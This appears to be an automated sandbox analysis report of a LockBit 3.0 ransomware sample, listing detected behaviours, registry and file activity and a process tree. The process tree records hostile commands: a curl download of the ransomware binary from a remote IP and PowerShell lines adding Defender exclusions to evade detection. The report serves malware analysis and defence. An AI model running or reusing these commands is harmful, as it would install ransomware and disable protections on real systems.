Analysis Overview
Threat Level: Known bad
The file https://gofile.io/d/OVEE6R was found to be: Known bad.
Malicious Activity Summary
Lockbit
Rule to detect Lockbit 3.0 ransomware Windows payload
Lockbit family
Renames multiple (656) files with added filename extension
Command and Scripting Interpreter: PowerShell
Downloads MZ/PE file
Executes dropped EXE
Reads user/profile data of web browsers
Drops desktop.ini file(s)
Indicator Removal: File Deletion
Legitimate hosting services abused for malware hosting/C2
UPX packed file
Drops file in System32 directory
Suspicious use of NtSetInformationThreadHideFromDebugger
Drops file in Windows directory
Subvert Trust Controls: Mark-of-the-Web Bypass
System Location Discovery: System Language Discovery
Browser Information Discovery
Enumerates physical storage devices
Modifies data under HKEY_USERS
Modifies registry class
Suspicious use of AdjustPrivilegeToken
Enumerates system info in registry
Suspicious use of FindShellTrayWindow
Suspicious use of WriteProcessMemory
Suspicious behavior: EnumeratesProcesses
Suspicious use of SetWindowsHookEx
Suspicious behavior: AddClipboardFormatListener
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
NTFS ADS
Checks processor information in registry
MITRE ATT&CK
Enterprise Matrix V16
Analysis: static1
Detonation Overview
Reported
2025-04-17 17:05
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2025-04-17 17:05
Reported
2025-04-17 17:07
Platform
win11-20250410-en
Max time kernel
74s
Max time network
88s
Command Line
Signatures
Lockbit
Lockbit family
Rule to detect Lockbit 3.0 ransomware Windows payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Renames multiple (656) files with added filename extension
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Downloads MZ/PE file
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Windows\system32\curl.exe | N/A |
| N/A | N/A | C:\Windows\system32\curl.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\Downloads\77821E2FC48F7AD1.exe | N/A |
| N/A | N/A | C:\Users\Admin\Downloads\LB3.exe | N/A |
| N/A | N/A | C:\ProgramData\1336.tmp | N/A |
| N/A | N/A | C:\Users\Admin\Downloads\77821E2FC48F7AD1.exe | N/A |
| N/A | N/A | C:\Users\Admin\Downloads\LB3.exe | N/A |
| N/A | N/A | C:\ProgramData\BDCE.tmp | N/A |
Reads user/profile data of web browsers
Drops desktop.ini file(s)
| Description | Indicator | Process | Target |
| File opened for modification | C:\$Recycle.Bin\S-1-5-21-2627618461-2240074273-3604016983-1000\desktop.ini | C:\Users\Admin\Downloads\LB3.exe | N/A |
| File opened for modification | F:\$RECYCLE.BIN\S-1-5-21-2627618461-2240074273-3604016983-1000\desktop.ini | C:\Users\Admin\Downloads\LB3.exe | N/A |
| File opened for modification | C:\$Recycle.Bin\S-1-5-21-2627618461-2240074273-3604016983-1000\desktop.ini | C:\Users\Admin\Downloads\LB3.exe | N/A |
Indicator Removal: File Deletion
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | api.gofile.io | N/A | N/A |
| N/A | api.gofile.io | N/A | N/A |
| N/A | api.gofile.io | N/A | N/A |
Drops file in System32 directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\system32\spool\PRINTERS\00002.SPL | C:\Windows\splwow64.exe | N/A |
| File created | C:\Windows\system32\spool\PRINTERS\PPm701o5mcrl9yidh2ldcujt07.TMP | C:\Windows\system32\printfilterpipelinesvc.exe | N/A |
| File created | C:\Windows\system32\spool\PRINTERS\PPfcxul87k_i2bawdma2f3h0apc.TMP | C:\Windows\system32\printfilterpipelinesvc.exe | N/A |
| File created | C:\Windows\system32\spool\PRINTERS\PPf0f_blq7jjs5emau7gadpir_.TMP | C:\Windows\system32\printfilterpipelinesvc.exe | N/A |
| File created | C:\Windows\system32\spool\PRINTERS\00003.SPL | C:\Windows\splwow64.exe | N/A |
| File created | C:\Windows\system32\spool\PRINTERS\PP3husm526qa5cns6a7bqtg2mr.TMP | C:\Windows\system32\printfilterpipelinesvc.exe | N/A |
| File created | C:\Windows\system32\spool\PRINTERS\PP30p004bpqaqxjo403w2f08tr.TMP | C:\Windows\system32\printfilterpipelinesvc.exe | N/A |
| File created | C:\Windows\system32\spool\PRINTERS\PP6jqdeqy3uqwqmv3fa6g4mj87c.TMP | C:\Windows\system32\printfilterpipelinesvc.exe | N/A |
Suspicious use of NtSetInformationThreadHideFromDebugger
| Description | Indicator | Process | Target |
| N/A | N/A | C:\ProgramData\1336.tmp | N/A |
| N/A | N/A | C:\ProgramData\BDCE.tmp | N/A |
UPX packed file
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping1128_1449343746\_metadata\verified_contents.json | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File created | C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping1128_1449343746\manifest.fingerprint | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File opened for modification | C:\Windows\SystemTemp | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File created | C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping1128_1449343746\LICENSE | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File created | C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping1128_1449343746\manifest.json | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File created | C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping1128_1449343746\sets.json | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
Subvert Trust Controls: Mark-of-the-Web Bypass
| Description | Indicator | Process | Target |
| File opened for modification | C:\Users\Admin\Downloads\77821E2FC48F7AD1.exe:Zone.Identifier | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
Browser Information Discovery
Enumerates physical storage devices
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\Downloads\LB3.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\ProgramData\1336.tmp | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\Downloads\77821E2FC48F7AD1.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\Downloads\LB3.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\ProgramData\BDCE.tmp | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\Downloads\77821E2FC48F7AD1.exe | N/A |
Checks processor information in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE | N/A |
Enumerates system info in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily | C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
Modifies data under HKEY_USERS
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133893831615051936" | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key created | \REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-2627618461-2240074273-3604016983-1000\{4DFF0642-E14C-4F33-BD66-A484B647F6D4} | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
NTFS ADS
| Description | Indicator | Process | Target |
| File opened for modification | C:\Users\Admin\Downloads\77821E2FC48F7AD1.exe:Zone.Identifier | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
Suspicious behavior: AddClipboardFormatListener
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE | N/A |
| N/A | N/A | C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeAssignPrimaryTokenPrivilege | N/A | C:\Users\Admin\Downloads\LB3.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Users\Admin\Downloads\LB3.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\Downloads\LB3.exe | N/A |
| Token: 36 | N/A | C:\Users\Admin\Downloads\LB3.exe | N/A |
| Token: SeImpersonatePrivilege | N/A | C:\Users\Admin\Downloads\LB3.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Users\Admin\Downloads\LB3.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Users\Admin\Downloads\LB3.exe | N/A |
| Token: 33 | N/A | C:\Users\Admin\Downloads\LB3.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Users\Admin\Downloads\LB3.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Users\Admin\Downloads\LB3.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Users\Admin\Downloads\LB3.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Users\Admin\Downloads\LB3.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Users\Admin\Downloads\LB3.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Users\Admin\Downloads\LB3.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Users\Admin\Downloads\LB3.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\Downloads\LB3.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Users\Admin\Downloads\LB3.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Users\Admin\Downloads\LB3.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Users\Admin\Downloads\LB3.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Users\Admin\Downloads\LB3.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Users\Admin\Downloads\LB3.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Users\Admin\Downloads\LB3.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Users\Admin\Downloads\LB3.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Users\Admin\Downloads\LB3.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Users\Admin\Downloads\LB3.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Users\Admin\Downloads\LB3.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Users\Admin\Downloads\LB3.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Users\Admin\Downloads\LB3.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Users\Admin\Downloads\LB3.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Users\Admin\Downloads\LB3.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Users\Admin\Downloads\LB3.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Users\Admin\Downloads\LB3.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Users\Admin\Downloads\LB3.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Users\Admin\Downloads\LB3.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Users\Admin\Downloads\LB3.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Users\Admin\Downloads\LB3.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Users\Admin\Downloads\LB3.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Users\Admin\Downloads\LB3.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Users\Admin\Downloads\LB3.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Users\Admin\Downloads\LB3.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Users\Admin\Downloads\LB3.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Users\Admin\Downloads\LB3.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Users\Admin\Downloads\LB3.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Users\Admin\Downloads\LB3.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Users\Admin\Downloads\LB3.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Users\Admin\Downloads\LB3.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Users\Admin\Downloads\LB3.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Users\Admin\Downloads\LB3.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Users\Admin\Downloads\LB3.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Users\Admin\Downloads\LB3.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Users\Admin\Downloads\LB3.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Users\Admin\Downloads\LB3.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Users\Admin\Downloads\LB3.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Users\Admin\Downloads\LB3.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Users\Admin\Downloads\LB3.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Users\Admin\Downloads\LB3.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Users\Admin\Downloads\LB3.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Users\Admin\Downloads\LB3.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Users\Admin\Downloads\LB3.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Users\Admin\Downloads\LB3.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Users\Admin\Downloads\LB3.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Users\Admin\Downloads\LB3.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
Suspicious use of SetWindowsHookEx
Suspicious use of WriteProcessMemory
Processes
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://gofile.io/d/OVEE6R
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=133.0.6943.99 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 --annotation=prod=Edge --annotation=ver=133.0.3065.69 --initial-client-data=0x2e4,0x2e8,0x2ec,0x2e0,0x2f4,0x7ffea0def208,0x7ffea0def214,0x7ffea0def220
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --string-annotations --always-read-main-dll --field-trial-handle=1708,i,10030018346180334729,18412512000094847350,262144 --variations-seed-version --mojo-platform-channel-handle=2260 /prefetch:11
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --string-annotations --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --always-read-main-dll --field-trial-handle=2184,i,10030018346180334729,18412512000094847350,262144 --variations-seed-version --mojo-platform-channel-handle=2180 /prefetch:2
C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\elevation_service.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\elevation_service.exe"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --string-annotations --always-read-main-dll --field-trial-handle=2448,i,10030018346180334729,18412512000094847350,262144 --variations-seed-version --mojo-platform-channel-handle=2580 /prefetch:13
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --always-read-main-dll --field-trial-handle=3420,i,10030018346180334729,18412512000094847350,262144 --variations-seed-version --mojo-platform-channel-handle=3484 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --always-read-main-dll --field-trial-handle=3432,i,10030018346180334729,18412512000094847350,262144 --variations-seed-version --mojo-platform-channel-handle=3512 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --always-read-main-dll --field-trial-handle=4844,i,10030018346180334729,18412512000094847350,262144 --variations-seed-version --mojo-platform-channel-handle=4800 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5020,i,10030018346180334729,18412512000094847350,262144 --variations-seed-version --mojo-platform-channel-handle=3720 /prefetch:14
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-US --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=4644,i,10030018346180334729,18412512000094847350,262144 --variations-seed-version --mojo-platform-channel-handle=5080 /prefetch:14
C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5596,i,10030018346180334729,18412512000094847350,262144 --variations-seed-version --mojo-platform-channel-handle=5612 /prefetch:14
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.ProfileImport --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5660,i,10030018346180334729,18412512000094847350,262144 --variations-seed-version --mojo-platform-channel-handle=5672 /prefetch:14
C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5596,i,10030018346180334729,18412512000094847350,262144 --variations-seed-version --mojo-platform-channel-handle=5612 /prefetch:14
C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\cookie_exporter.exe
cookie_exporter.exe --cookie-json=1132
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --no-startup-window --win-session-start
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --no-startup-window --win-session-start
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=PooledProcess2 --lang=en-US --service-sandbox-type=utility --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5700,i,10030018346180334729,18412512000094847350,262144 --variations-seed-version --mojo-platform-channel-handle=5664 /prefetch:14
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --always-read-main-dll --field-trial-handle=3388,i,10030018346180334729,18412512000094847350,262144 --variations-seed-version --mojo-platform-channel-handle=5844 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --lang=en-US --service-sandbox-type=collections --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=4868,i,10030018346180334729,18412512000094847350,262144 --variations-seed-version --mojo-platform-channel-handle=4876 /prefetch:14
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --always-read-main-dll --field-trial-handle=6252,i,10030018346180334729,18412512000094847350,262144 --variations-seed-version --mojo-platform-channel-handle=6296 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=6272,i,10030018346180334729,18412512000094847350,262144 --variations-seed-version --mojo-platform-channel-handle=6760 /prefetch:14
C:\Users\Admin\Downloads\77821E2FC48F7AD1.exe
"C:\Users\Admin\Downloads\77821E2FC48F7AD1.exe"
C:\Windows\system32\cmd.exe
"C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\CF37.tmp\CF38.tmp\CF39.bat C:\Users\Admin\Downloads\77821E2FC48F7AD1.exe"
C:\Windows\system32\curl.exe
curl -o "C:\Users\Admin\Downloads\LB3.exe" "http://45.86.155.76/LB3.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "Start-Process powershell -ArgumentList 'Add-MpPreference -ExclusionPath ''C:\Users\Admin\Downloads''; Add-MpPreference -ExclusionProcess ''C:\Users\Admin\Downloads\LB3.exe'' -ErrorAction Stop' -Verb RunAs"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\Downloads'; Add-MpPreference -ExclusionProcess 'C:\Users\Admin\Downloads\LB3.exe' -ErrorAction Stop
C:\Users\Admin\Downloads\LB3.exe
"C:\Users\Admin\Downloads\LB3.exe"
C:\Windows\splwow64.exe
C:\Windows\splwow64.exe 12288
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k PrintWorkflow -s PrintWorkflowUserSvc
C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
C:\Windows\system32\printfilterpipelinesvc.exe
C:\Windows\system32\printfilterpipelinesvc.exe -Embedding
C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
/insertdoc "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\{4E7ABF30-AA79-4246-8352-F703D4A19605}.xps" 133893831807900000
C:\ProgramData\1336.tmp
"C:\ProgramData\1336.tmp"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --message-loop-type-ui --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=6928,i,10030018346180334729,18412512000094847350,262144 --variations-seed-version --mojo-platform-channel-handle=2572 /prefetch:14
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
